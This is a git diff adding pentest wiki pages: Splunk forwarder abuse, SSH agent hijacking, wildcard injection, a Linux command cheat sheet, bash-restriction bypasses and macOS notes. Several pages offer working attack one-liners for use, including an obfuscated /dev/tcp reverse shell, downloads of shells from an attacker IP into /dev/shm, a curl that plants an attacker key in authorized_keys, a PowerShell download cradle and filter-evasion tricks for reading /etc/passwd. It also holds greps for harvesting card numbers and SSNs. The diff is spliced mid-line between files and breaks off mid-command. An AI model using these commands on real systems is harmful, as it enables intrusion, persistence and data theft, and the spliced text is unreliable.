Remediation Recommendation’s for Splunk, Inc: + +I recommend implementing all of the following solutions to provide defense in depth: + +1. Ideally, the Universal Forwarder agent would not have a port open at all, but rather would poll the Splunk server at regular intervals for instructions. +2. Enable TLS mutual authentication between the clients and server, using individual keys for each client. This would provide very high bi-directional security between all Splunk services. TLS mutual authentication is being heavily implemented in agents and IoT devices, this is the future of trusted device client to server communication. +3. Send all code, single line or script files, in a compressed file which is encrypted and signed by the Splunk server. This does not protect the agent data sent through the API, but protects against malicious Remote Code Execution from a 3rd party. + +#### Remediation Recommendation’s for Splunk customers: + +1. Ensure a very strong password is set for Splunk agents. I recommend at least a 15-character random password, but since these passwords are never typed this could be set to a very large password such as 50 characters. +2. Configure host based firewalls to only allow connections to port 8089/TCP \(Universal Forwarder Agent’s port\) from the Splunk server. + +### Recommendations for Red Team: + +1. Download a copy of Splunk Universal Forwarder for each operating system, as it is a great light weight signed implant. Good to keep a copy incase Splunk actually fixes this. + +### Exploits/Blogs from other researchers + +Usable public exploits: + +* https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2 +* https://www.exploit-db.com/exploits/46238 +* https://www.exploit-db.com/exploits/46487 + +Related blog posts: + +* https://clement.notin.org/blog/2019/02/25/Splunk-Universal-Forwarder-Hijacking-2-SplunkWhisperer2/ +* https://medium.com/@airman604/splunk-universal-forwarder-hijacking-5899c3e0e6b2 +* https://www.hurricanelabs.com/splunk-tutorials/using-splunk-as-an-offensive-security-tool + +_\*\* Note: \*\*_ This issue is a serious issue with Splunk systems and it has been exploited by other testers for years. While Remote Code Execution is an intended feature of Splunk Universal Forwarder, the implimentaion of this is dangerous. I attempted to submit this bug via Splunk’s bug bounty program in the very unlikely chance they are not aware of the design implications, but was notified that any bug submissions implement the Bug Crowd/Splunk disclosure policy which states no details of the vulnerability may be discussed publically _ever_ without Splunk’s permission. I requested a 90 day disclosure timeline and was denied. As such, I did not responsibly disclose this since I am reasonably sure Splunk is aware of the issue and has chosen to ignore it, I feel this could severely impact companies, and it is the responsibility of the infosec community to educate businesses. + diff --git a/linux-unix/privilege-escalation/ssh-forward-agent-exploitation.md b/linux-unix/privilege-escalation/ssh-forward-agent-exploitation.md new file mode 100644 index 00000000000..4d7d7099b20 --- /dev/null +++ b/linux-unix/privilege-escalation/ssh-forward-agent-exploitation.md @@ -0,0 +1,164 @@ +# SSH Forward Agent exploitation + +## Summary + +What can you do if you discover inside the `/etc/ssh_config` or inside `$HOME/.ssh/config` configuration this: + +```text +ForwardAgent yes +``` + +If you are root inside the machine you can probably **access any ssh connection made by any agent** that you can find in the _/tmp_ directory + +Impersonate Bob using one of Bob's ssh-agent: + +```bash +SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816 ssh bob@boston +``` + +### Why does this work? + +When you set the variable `SSH_AUTH_SOCK` you are accessing the keys of Bob that have been used in Bobs ssh connection. Then, if his private key is still there \(normally it will be\), you will be able to access any host using it. + +As the private key is saved in the memory of the agent uncrypted, I suppose that if you are Bob but you don't know the password of the private key, you can still access the agent and use it. + +Another option, is that the user owner of the agent and root may be able to access the memory of the agent and extract the private key. + +## Long explanation and exploitation + +**Taken from:** [**https://www.clockwork.com/news/2012/09/28/602/ssh\_agent\_hijacking/**](https://www.clockwork.com/news/2012/09/28/602/ssh_agent_hijacking/)\*\*\*\* + +### **When ForwardAgent Can’t Be Trusted** + +SSH without passwords makes life with Unix-like operating systems much easier. If your network requires chained ssh sessions \(to access a restricted network, for example\), agent forwarding becomes extremely helpful. With agent forwarding it’s possible for me to connect from my laptop to my dev server and from there run an svn checkout from yet another server, all without passwords, while keeping my private key safe on my local workstation. + +This can be dangerous, though. A quick web search will reveal several articles indicating this is only safe if the intermediate hosts are trustworthy. Rarely, however, will you find an explanation of _why_ it’s dangerous. + +That’s what this article is for. But first, some background. + +### **How Passwordless Authentication Works** + +When authenticating in normal mode, SSH uses your password to prove that you are who you say you are. The server compares a hash of this password to one it has on file, verifies that the hashes match, and lets you in. + +If an attacker is able to break the encryption used to protect your password while it’s being sent to the server, they can steal the it and log in as you whenever they desire. If an attacker is allowed to perform hundreds of thousands of attempts, they can eventually guess your password. + +A much safer authentication method is [public key authentication](http://www.ibm.com/developerworks/library/l-keyc/index.html), a way of logging in without a password. Public key authentication requires a matched pair of public and private keys. The public key encrypts messages that can only be decrypted with the private key. The remote computer uses its copy of your public key to encrypt a secret message to you. You prove you are you by decrypting the message using your private key and sending the message back to the remote computer. Your private key remains safely on your local computer the entire time, safe from attack. + +The private key is valuable and must be protected, so by default it is stored in an encrypted format. Unfortunately this means entering your encryption passphrase before using it. Many articles suggest using passphrase-less \(unencrypted\) private keys to avoid this inconvenience. That’s a bad idea, as anyone with access to your workstation \(via physical access, theft, or hackery\) now also has free access to any computers configured with your public key. + +OpenSSH includes [ssh-agent](http://www.openbsd.org/cgi-bin/man.cgi?query=ssh-agent), a daemon that runs on your local workstation. It loads a decrypted copy of your private key into memory, so you only have to enter your passphrase once. It then provides a local [socket](http://en.wikipedia.org/wiki/Unix_domain_socket) that the ssh client can use to ask it to decrypt the encrypted message sent back by the remote server. Your private key stays safely ensconced in the ssh-agent process’ memory while still allowing you to ssh around without typing in passwords. + +### **How ForwardAgent Works** + +Many tasks require “chaining” ssh sessions. Consider my example from earlier: I ssh from my workstation to the dev server. While there, I need to perform an svn update, using the “svn+ssh” protocol. Since it would be silly to leave an unencrypted copy of my super-secret private key on a shared server, I’m now stuck with password authentication. If, however, I enabled “ForwardAgent” in the ssh config on my workstation, ssh uses its built-in tunneling capabilities to create another socket on the dev server that is tunneled back to the ssh-agent socket on my local workstation. This means that the ssh client on the dev server can now send “decrypt this secret message” requests directly back to the ssh-agent running on my workstation, authenticating itself to the svn server without ever having access to my private key. + +### **Why This Can Be Dangerous** + +Simply put, anyone with root privilege on the the intermediate server can make free use of your ssh-agent to authenticate them to other servers. A simple demonstration shows how trivially this can be done. Hostnames and usernames have been changed to protect the innocent. + +My laptop is running ssh-agent, which communicates with the ssh client programs via a socket. The path to this socket is stored in the SSH\_AUTH\_SOCK environment variable: + +```text +mylaptop:~ env|grep SSH_AUTH_SOCK +SSH_AUTH_SOCK=/tmp/launch-oQKpeY/Listeners + +mylaptop:~ ls -l /tmp/launch-oQKpeY/Listeners +srwx------ 1 alice wheel 0 Apr 3 11:04 /tmp/launch-oQKpeY/Listeners +``` + +The [ssh-add](http://www.openbsd.org/cgi-bin/man.cgi?query=ssh-add) program lets us view and interact with keys in the agent: + +```text +mylaptop:~ alice$ ssh-add -l +2048 2c:2a:d6:09:bb:55:b3:ca:0c:f1:30:f9:d9:a3:c6:9e /Users/alice/.ssh/id_rsa (RSA) +``` + +I have “ForwardAgent yes” in the ~/.ssh/config on my laptop. So ssh is going to create a tunnel connecting the local socket to a local socket on the remote server: + +```text +mylaptop:~ alice$ ssh seattle + +seattle:~ $ env|grep SSH_AUTH_SOCK +SSH_AUTH_SOCK=/tmp/ssh-WsKcHa9990/agent.9990 +``` + +Even though my keys are not installed on “seattle”, the ssh client programs are still able to access the agent running on my local machine: + +```text +seattle:~ alice $ ssh-add -l +2048 2c:2a:d6:09:bb:55:b3:ca:0c:f1:30:f9:d9:a3:c6:9e /Users/alice/.ssh/id_rsa (RSA) +``` + +So… who can we mess with? + +```text +seattle:~ alice $ who +alice pts/0 2012-04-06 18:24 (office.example.com) +bob pts/1 2012-04-03 01:29 (office.example.com) +alice pts/3 2012-04-06 18:31 (office.example.com) +alice pts/5 2012-04-06 18:31 (office.example.com) +alice pts/6 2012-04-06 18:33 (office.example.com) +charlie pts/23 2012-04-06 13:10 (office.example.com) +charlie pts/27 2012-04-03 12:32 (office.example.com) +bob pts/29 2012-04-02 10:58 (office.example.com) +``` + +I’ve never liked Bob. To find his agent connection, I need to find the child process of one of his ssh sessions: + +```text +seattle:~ alice $ sudo -s +[sudo] password for alice: + +seattle:~ root # pstree -p bob +sshd(16816)───bash(16817) + +sshd(25296)───bash(25297)───vim(14308) +``` + +There are several ways for root to view the environment of a running process. On Linux, the data is available in /proc/<pid>/environ. Since it’s stored in NULL-terminated strings, I’ll use tr to convert the NULLs to newlines: + +```text +seattle:~ root # tr '' 'n' < /proc/16817/environ | grep SSH_AUTH_SOCK +SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816 +``` + +I now have everything I need to know in order to hijack Bob’s ssh-agent: + +```text +seattle:~ root # SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816 ssh-add -l +2048 05:f1:12:f2:e6:ad:cb:0b:60:e3:92:fa:c3:62:19:17 /home/bob/.ssh/id_rsa (RSA) +``` + +If I happen to have a specific target in mind, I should now be able to connect directly. Otherwise, just watching the process list or grepping through Bob’s history file should present plenty of targets of opportunity. In this case, I know Bob has all sorts of super secret files stored on the server named “boston”: + +```text +seattle:~ root # SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816 ssh bob@boston +bob@boston:~$ whoami +bob +``` + +I have succesfully parlayed my root privileges on “seattle” to access as bob on “boston”. I’ll bet I can use that to get him fired. + +### **Protect Yourself!** + +Don’t let your ssh-agent store your keys indefinitely. On OS X, configure your Keychain to lock after inactivity or when your screen locks. On other Unix-y platforms, pass the -t option to ssh-agent so its keys will be removed after seconds. + +Don’t enable agent forwarding when connecting to untrustworthy hosts. Fortunately, the ~/.ssh/config syntax makes this fairly simple: + +```text +Host trustworthyhost + ForwardAgent yes +``` + +```text +Host * + ForwardAgent no +``` + +### **Recommended Reading** + +* [OpenSSH key management](http://www.ibm.com/developerworks/library/l-keyc/index.html) – Daniel Robbins +* [An Illustrated Guide to SSH Agent Forwarding](http://www.unixwiz.net/techtips/ssh-agent-forwarding.html) – Steve Friedl +* [ssh-agent manual](http://www.openbsd.org/cgi-bin/man.cgi?query=ssh-agent) +* [ssh-add manual](http://www.openbsd.org/cgi-bin/man.cgi?query=ssh-add) + diff --git a/linux-unix/privilege-escalation/wildcards-spare-tricks.md b/linux-unix/privilege-escalation/wildcards-spare-tricks.md new file mode 100644 index 00000000000..8512a87abcb --- /dev/null +++ b/linux-unix/privilege-escalation/wildcards-spare-tricks.md @@ -0,0 +1,65 @@ +# Wildcards Spare tricks + +### chown, chmod + +You can **indicate which file owner and permissions you want to copy for the rest of the files** + +```bash +touch "--reference=/my/own/path/filename" +``` + +You can exploit this using [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _\(combined attack\)_ +More info in [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930) + +### Tar + +**Execute arbitrary commands:** + +```bash +touch "--checkpoint=1" +touch "--checkpoint-action=exec=sh shell.sh" +``` + +You can exploit this using [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _\(tar attack\)_ +More info in [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930) + +### Rsync + +**Execute arbitrary commands:** + +```bash +Interesting rsync option from manual: + + -e, --rsh=COMMAND specify the remote shell to use + --rsync-path=PROGRAM specify the rsync to run on remote machine +``` + +```bash +touch "-e sh shell.sh" +``` + +You can exploit this using [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _\(_rsync _attack\)_ +More info in [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930) + +### 7z + +In **7z** even using `--` before `*` \(note that `--` means that the following input cannot treated as parameters, so just file paths in this case\) you can cause an arbitrary error to read a file, so if a command like the following one is being executed by root: + +```bash +7za a /backup/$filename.zip -t7z -snl -p$pass -- * +``` + +And you can create files in the folder were this is being executed, you could create the file `@root.txt` and the file `root.txt` being a **symlink** to the file you want to read: + +```bash +cd /path/to/7z/acting/folder +touch @root.txt +ln -s /file/you/want/to/read root.txt +``` + +Then, when **7z** is execute, it will treat `root.txt` as a file containing the list of files it should compress \(thats what the existence of `@root.txt` indicates\) and when it 7z read `root.txt` it will read `/file/you/want/to/read` and **as the content of this file isn't a list of files, it will throw and error** showing the content. + +_More info in Write-ups of the box CTF from HackTheBox._ + +\_\_ + diff --git a/linux-unix/useful-linux-commands/README.md b/linux-unix/useful-linux-commands/README.md new file mode 100644 index 00000000000..d8140eded1a --- /dev/null +++ b/linux-unix/useful-linux-commands/README.md @@ -0,0 +1,273 @@ +# Useful Linux Commands + +## Common Bash + +```bash +#Exfiltration using Base64 +base64 -w 0 file + +#Get HexDump without new lines +xxd -p boot12.bin | tr -d '\n' + +#Add public key to authorized keys +curl https://ATTACKER_IP/.ssh/id_rsa.pub >> ~/.ssh/authotized_keys + +#Echo without new line and Hex +echo -n -e + +#Count +wc -l #Lines +wc -c #Chars + +#Sort +sort -nr #Sort by number and then reverse +cat file | sort | uniq #Sort and delete duplicates + +#Replace in file +sed -i 's/OLD/NEW/g' path/file #Replace string inside a file + +#Download in RAM +wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py +wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm +curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py + +#Files used by network processes +lsof #Open files belonging to any process +lsof -p 3 #Open files used by the process +lsof -i #Files used by networks processes +lsof -i 4 #Files used by network IPv4 processes +lsof -i 6 #Files used by network IPv6 processes +lsof -i 4 -a -p 1234 #List all open IPV4 network files in use by the process 1234 +lsof +D /lib #Processes using files inside the indicated dir +lsof -i :80 #Files uses by networks processes +fuser -nv tcp 80 + +#Decompress +tar -xvzf /path/to/yourfile.tgz +tar -xvjf /path/to/yourfile.tbz +bzip2 -d /path/to/yourfile.bz2 +tar jxf file.tar.bz2 +gunzip /path/to/yourfile.gz +unzip file.zip +7z -x file.7z +sudo apt-get install xz-utils; unxz file.xz + +#Add new user +useradd -p 'openssl passwd -1 ' hacker + +#Clipboard +xclip -sel c < cat file.txt + +#HTTP servers +python -m SimpleHTTPServer 80 +python3 -m http.server +ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start" +php -S $ip:80 + +##Curl +#json data +curl --header "Content-Type: application/json" --request POST --data '{"password":"password", "username":"admin"}' http://host:3000/endpoint +#Auth via JWT +curl -X GET -H 'Authorization: Bearer ' http://host:3000/endpoint + +#Send Email +sendEmail -t to@email.com -f from@email.com -s 192.168.8.131 -u Subject -a file.pdf #You will be prompted for the content + +#DD copy hex bin file without first X (28) bytes +dd if=file.bin bs=28 skip=1 of=blob + +#Mount .vhd files (virtual hard drive) +sudo apt-get install libguestfs-tools +guestmount --add NAME.vhd --inspector --ro /mnt/vhd #For read-only, create first /mnt/vhd + +## ssh-keyscan, help to find if 2 ssh ports are from the same host comparing keys +ssh-keyscan 10.10.10.101 + +## Openssl +openssl s_client -connect 10.10.10.127:443 #Get the certificate from a server +openssl x509 -in ca.cert.pem -text #Read certificate +openssl genrsa -out newuser.key 2048 #Create new RSA2048 key +openssl req -new -key newuser.key -out newuser.csr #Generate certificate from a private key. Recommended to set the "Organizatoin Name"(Fortune) and the "Common Name" (newuser@fortune.htb) +openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Create certificate +openssl x509 -req -in newuser.csr -CA intermediate.cert.pem -CAkey intermediate.key.pem -CAcreateserial -out newuser.pem -days 1024 -sha256 #Create a signed certificate +openssl pkcs12 -export -out newuser.pfx -inkey newuser.key -in newuser.pem #Create from the signed certificate the pkcs12 certificate format (firefox) +## If you only needs to create a client certificate from a Ca certificate and the CA key, you can do it using: +openssl pkcs12 -export -in ca.cert.pem -inkey ca.key.pem -out client.p12 +# Decrypt ssh key +openssl rsa -in key.ssh.enc -out key.ssh +#Decrypt +openssl enc -aes256 -k -d -in backup.tgz.enc -out b.tgz + +#Count number of instructions executed by a program, need a host based linux (not working in VM) +perf stat -x, -e instructions:u "ls" + +##Find trick for HTB, find files from 2018-12-12 to 2018-12-14 +find / -newermt 2018-12-12 ! -newermt 2018-12-14 -type f -readable -not -path "/proc/*" -not -path "/sys/*" -ls 2>/dev/null + +#Reconfigure timezone +sudo dpkg-reconfigure tzdata + +#Search from wich package is a binary +apt-file search /usr/bin/file #Needed: apt-get install apt-file + +#Protobuf decode https://www.ezequiel.tech/2020/08/leaking-google-cloud-projects.html +echo "CIKUmMesGw==" | base64 -d | protoc --decode_raw + +#Set not removable bit +sudo chattr +i file.txt +sudo chattr -i file.txt #Remove the bit so you can delete it +``` + +## Bash for Windows + +```bash +#Base64 for Windows +echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" | iconv --to-code UTF-16LE | base64 -w0 + +#Exe compression +upx -9 nc.exe + +#Exe2bat +wine exe2bat.exe nc.exe nc.txt + +#Compile Windows python exploit to exe +pip install pyinstaller +wget -O exploit.py http://www.exploit-db.com/download/31853 +python pyinstaller.py --onefile exploit.py + +#Compile for windows +#sudo apt-get install gcc-mingw-w64-i686 +i686-mingw32msvc-gcc -o executable useradd.c +``` + +## Greps + +```bash +#Extract emails from file +grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" file.txt + +#Extract valid IP addresses +grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" file.txt + +#Extract passwords +grep -i "pwd\|passw" file.txt + +#Extract users +grep -i "user\|invalid\|authentication\|login" file.txt + +## Extract hashes +#Extract md5 hashes ({32}), sha1 ({40}), sha256({64}), sha512({128}) +egrep -oE '(^|[^a-fA-F0-9])[a-fA-F0-9]{32}([^a-fA-F0-9]|$)' *.txt | egrep -o '[a-fA-F0-9]{32}' > md5-hashes.txt +#Extract valid MySQL-Old hashes +grep -e "[0-7][0-9a-f]{7}[0-7][0-9a-f]{7}" *.txt > mysql-old-hashes.txt +#Extract blowfish hashes +grep -e "$2a\$\08\$(.){75}" *.txt > blowfish-hashes.txt +#Extract Joomla hashes +egrep -o "([0-9a-zA-Z]{32}):(w{16,32})" *.txt > joomla.txt +#Extract VBulletin hashes +egrep -o "([0-9a-zA-Z]{32}):(S{3,32})" *.txt > vbulletin.txt +#Extraxt phpBB3-MD5 +egrep -o '$H$S{31}' *.txt > phpBB3-md5.txt +#Extract Wordpress-MD5 +egrep -o '$P$S{31}' *.txt > wordpress-md5.txt +#Extract Drupal 7 +egrep -o '$S$S{52}' *.txt > drupal-7.txt +#Extract old Unix-md5 +egrep -o '$1$w{8}S{22}' *.txt > md5-unix-old.txt +#Extract md5-apr1 +egrep -o '$apr1$w{8}S{22}' *.txt > md5-apr1.txt +#Extract sha512crypt, SHA512(Unix) +egrep -o '$6$w{8}S{86}' *.txt > sha512crypt.txt + +#Extract e-mails from text files +grep -E -o "\b[a-zA-Z0-9.#?$*_-]+@[a-zA-Z0-9.#?$*_-]+.[a-zA-Z0-9.-]+\b" *.txt > e-mails.txt + +#Extract HTTP URLs from text files +grep http | grep -shoP 'http.*?[" >]' *.txt > http-urls.txt +#For extracting HTTPS, FTP and other URL format use +grep -E '(((https|ftp|gopher)|mailto)[.:][^ >" ]*|www.[-a-z0-9.]+)[^ .,; >">):]' *.txt > urls.txt +#Note: if grep returns "Binary file (standard input) matches" use the following approaches # tr '[\000-\011\013-\037177-377]' '.' < *.log | grep -E "Your_Regex" OR # cat -v *.log | egrep -o "Your_Regex" + +#Extract Floating point numbers +grep -E -o "^[-+]?[0-9]*.?[0-9]+([eE][-+]?[0-9]+)?$" *.txt > floats.txt + +## Extract credit card data +#Visa +grep -E -o "4[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > visa.txt +#MasterCard +grep -E -o "5[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > mastercard.txt +#American Express +grep -E -o "\b3[47][0-9]{13}\b" *.txt > american-express.txt +#Diners Club +grep -E -o "\b3(?:0[0-5]|[68][0-9])[0-9]{11}\b" *.txt > diners.txt +#Discover +grep -E -o "6011[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > discover.txt +#JCB +grep -E -o "\b(?:2131|1800|35d{3})d{11}\b" *.txt > jcb.txt +#AMEX +grep -E -o "3[47][0-9]{2}[ -]?[0-9]{6}[ -]?[0-9]{5}" *.txt > amex.txt + +## Extract IDs +#Extract Social Security Number (SSN) +grep -E -o "[0-9]{3}[ -]?[0-9]{2}[ -]?[0-9]{4}" *.txt > ssn.txt +#Extract Indiana Driver License Number +grep -E -o "[0-9]{4}[ -]?[0-9]{2}[ -]?[0-9]{4}" *.txt > indiana-dln.txt +#Extract US Passport Cards +grep -E -o "C0[0-9]{7}" *.txt > us-pass-card.txt +#Extract US Passport Number +grep -E -o "[23][0-9]{8}" *.txt > us-pass-num.txt +#Extract US Phone Numberss +grep -Po 'd{3}[s-_]?d{3}[s-_]?d{4}' *.txt > us-phones.txt +#Extract ISBN Numbers +egrep -a -o "\bISBN(?:-1[03])?:? (?=[0-9X]{10}$|(?=(?:[0-9]+[- ]){3})[- 0-9X]{13}$|97[89][0-9]{10}$|(?=(?:[0-9]+[- ]){4})[- 0-9]{17}$)(?:97[89][- ]?)?[0-9]{1,5}[- ]?[0-9]+[- ]?[0-9]+[- ]?[0-9X]\b" *.txt > isbn.txt +``` + +## Nmap search help + +```bash +#Nmap scripts ((default or version) and smb)) +nmap --script-help "(default or version) and *smb*" +locate -r '\.nse$' | xargs grep categories | grep 'default\|version\|safe' | grep smb +nmap --script-help "(default or version) and smb)" +``` + +## Bash + +```bash +#All bytes inside a file (except 0x20 and 0x00) +for j in $((for i in {0..9}{0..9} {0..9}{a..f} {a..f}{0..9} {a..f}{a..f}; do echo $i; done ) | sort | grep -v "20\|00"); do echo -n -e "\x$j" >> bytes; done +``` + +## Iptables + +```bash +#Delete curent rules and chains +iptables --flush +iptables --delete-chain + +#allow loopback +iptables -A INPUT -i lo -j ACCEPT +iptables -A OUTPUT -o lo -j ACCEPT + +#drop ICMP +iptables -A INPUT -p icmp -m icmp --icmp-type any -j DROP +iptables -A OUTPUT -p icmp -j DROP + +#allow established connections +iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT + +#allow ssh, http, https, dns +iptables -A INPUT -s 10.10.10.10/24 -p tcp -m tcp --dport 22 -j ACCEPT +iptables -A INPUT -p tcp -m state --state NEW -m tcp --dport 80 -j ACCEPT +iptables -A INPUT -p tcp -m state --state NEW -m tcp --dport 443 -j ACCEPT +iptables -A INPUT -p udp -m udp --sport 53 -j ACCEPT +iptables -A INPUT -p tcp -m tcp --sport 53 -j ACCEPT +iptables -A OUTPUT -p udp -m udp --dport 53 -j ACCEPT +iptables -A OUTPUT -p tcp -m tcp --dport 53 -j ACCEPT + +#default policies +iptables -P INPUT DROP +iptables -P FORWARD ACCEPT +iptables -P OUTPUT ACCEPT +``` + diff --git a/linux-unix/useful-linux-commands/bypass-bash-restrictions.md b/linux-unix/useful-linux-commands/bypass-bash-restrictions.md new file mode 100644 index 00000000000..2602181f0e4 --- /dev/null +++ b/linux-unix/useful-linux-commands/bypass-bash-restrictions.md @@ -0,0 +1,149 @@ +# Bypass Bash Restrictions + +## Reverse Shell + +```bash +# Double-Base64 is a great way to avoid bad characters like +, works 99% of the time +echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g' +#echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h +``` + +### Short Rev shell + +```bash +#Trick from Dikline +#Get a rev shell with +(sh)0>/dev/tcp/10.10.10.10/443 +#Then get the out of the rev shell executing inside of it: +exec >&0 +``` + +## Bypass Paths and forbidden words + +```bash +# Question mark binary substitution +/usr/bin/p?ng # /usr/bin/ping +nma? -p 80 localhost # /usr/bin/nmap -p 80 localhost + +# Wildcard(*) binary substitution +/usr/bin/who*mi # /usr/bin/whoami + +# Wildcard + local directory arguments +touch -- -la # -- stops processing options after the -- +ls * + +# [chars] +/usr/bin/n[c] # /usr/bin/nc + +# Quotes / Concatenation +'p'i'n'g # ping +"w"h"o"a"m"i # whoami +\u\n\a\m\e \-\a # uname -a +ech''o test # echo test +ech""o test # echo test +bas''e64 # base64 +/\b\i\n/////s\h + +# Execution through $0 +echo whoami|$0 + +# Uninitialized variables: A uninitialized variable equals to null (nothing) +cat$u /etc$u/passwd$u # Use the uninitialized variable without {} before any symbol +p${u}i${u}n${u}g # Equals to ping, use {} to put the uninitialized variables between valid characters + +# Fake commands +p$(u)i$(u)n$(u)g # Equals to ping but 3 errors trying to execute "u" are shown +w`u`h`u`o`u`a`u`m`u`i # Equals to whoami but 5 errors trying to execute "u" are shown + +# Concatenation of strings using history +!-1 # This will be substitute by the last command executed, and !-2 by the penultimate command +mi # This will throw an error +whoa # This will throw an error +!-1!-2 # This will execute whoami +``` + +## Bypass forbidden spaces + +```bash +# {form} +{cat,lol.txt} # cat lol.txt +{echo,test} # echo test + +## IFS - Internal field separator, change " " for any other character ("]" in this case) +cat${IFS}/etc/passwd # cat /etc/passwd +cat$IFS/etc/passwd # cat /etc/passwd + +# Put the command line in a variable and then execute it +IFS=];b=wget]10.10.14.21:53/lol]-P]/tmp;$b +IFS=];b=cat]/etc/passwd;$b # Using 2 ";" +IFS=,;`cat<<.noindex`**: Files and folder with this extension won't be indexed by Spotlight. +* **`$HOME/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV`**2: Contains information about downloaded files, like the URL from where they were downloaded. +* **`/var/log/system.log`**: Main log of OSX systems. com.apple.syslogd.plist is responsible for the execution of syslogging \(you can check if it's disabled looking for "com.apple.syslogd" in `launchctl list`. +* **`/private/var/log/asl/*.asl`**: These are the Apple System Logs which may contain interesting information. +* **`$HOME/Library/Preferences/com.apple.recentitems.plist`**: Stores recently accessed files and applications through "Finder". +* **`$HOME/Library/Preferences/com.apple.loginitems.plsit`**: Stores items to launch upon system startup +* **`$HOME/Library/Logs/DiskUtility.log`**: Log file for thee DiskUtility App \(info about drives, including USBs\) +* **`/Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist`**: Data about wireless access points. +* **`/private/var/db/launchd.db/com.apple.launchd/overrides.plist`**: List of daemons deactivated. +* **`/private/etc/kcpassword`**: If autologin is enabled this file will contain the users login password XORed with a key. + +### Common users + +* **Daemon**: User reserved for system daemons. The default daemon account names usually start with a "\_": + + ```bash + _amavisd, _analyticsd, _appinstalld, _appleevents, _applepay, _appowner, _appserver, _appstore, _ard, _assetcache, _astris, _atsserver, _avbdeviced, _calendar, _captiveagent, _ces, _clamav, _cmiodalassistants, _coreaudiod, _coremediaiod, _coreml, _ctkd, _cvmsroot, _cvs, _cyrus, _datadetectors, _demod, _devdocs, _devicemgr, _diskimagesiod, _displaypolicyd, _distnote, _dovecot, _dovenull, _dpaudio, _driverkit, _eppc, _findmydevice, _fpsd, _ftp, _fud, _gamecontrollerd, _geod, _hidd, _iconservices, _installassistant, _installcoordinationd, _installer, _jabber, _kadmin_admin, _kadmin_changepw, _knowledgegraphd, _krb_anonymous, _krb_changepw, _krb_kadmin, _krb_kerberos, _krb_krbtgt, _krbfast, _krbtgt, _launchservicesd, _lda, _locationd, _logd, _lp, _mailman, _mbsetupuser, _mcxalr, _mdnsresponder, _mobileasset, _mysql, _nearbyd, _netbios, _netstatistics, _networkd, _nsurlsessiond, _nsurlstoraged, _oahd, _ondemand, _postfix, _postgres, _qtss, _reportmemoryexception, _rmd, _sandbox, _screensaver, _scsd, _securityagent, _softwareupdate, _spotlight, _sshd, _svn, _taskgated, _teamsserver, _timed, _timezone, _tokend, _trustd, _trustevaluationagent, _unknown, _update_sharing, _usbmuxd, _uucp, _warmd, _webauthserver, _windowserver, _www, _wwwproxy, _xserverdocs + ``` + +* **Guest**: Account for guests with very strict permissions + * `state=("automaticTime" "afpGuestAccess" "filesystem" "guestAccount" "smbGuestAccess"); for i in "${state[@]}"; do sysadminctl -"${i}" status; done;` +* **Nobody**: Processes are executed with this user when minimal permissions are required +* **Root** + +### User Privileges + +* **Standard User:** The most basic of users. This user needs permissions granted from an admin user when attempting to install software or perform other advanced tasks. They are not able to do it on their own. +* **Admin User**: A user who operates most of the time as a standard user but is also allowed to perform root actions such as install software and other administrative tasks. All users belonging to the admin group are **given access to root via the sudoers file**. +* **Root**: Root is a user allowed to perform almost any action \(there are limitations imposed by protections like System Integrity Protection\). + * For example root won't be able to place a file inside `/System` + +### **File ACLs** + +When the file contains ACLs you will **find a "+" when listing the permissions like in**: + +```bash +ls -ld Movies +drwx------+ 7 username staff 224 15 Apr 19:42 Movies +``` + +You can **read the ACLs** of the file with: + +```bash +ls -lde Movies +drwx------+ 7 username staff 224 15 Apr 19:42 Movies + 0: group:everyone deny delete +``` + +You can find **all the files with ACLs** with \(this is veeery slow\): + +```bash +ls -RAle / 2>/dev/null | grep -E -B1 "\d: " +``` + +### Resource Forks or MacOS ADS + +This is a way to obtain **Alternate Data Streams in MacOS** machines. You can save content inside an extended attribute called **com.apple.ResourceFork** inside a file by saving it in **file/..namedfork/rsrc**. + +```bash +echo "Hello" > a.txt +echo "Hello Mac ADS" > a.txt/..namedfork/rsrc + +xattr -l a.txt #Read extended attributes +com.apple.ResourceFork: Hello Mac ADS + +ls 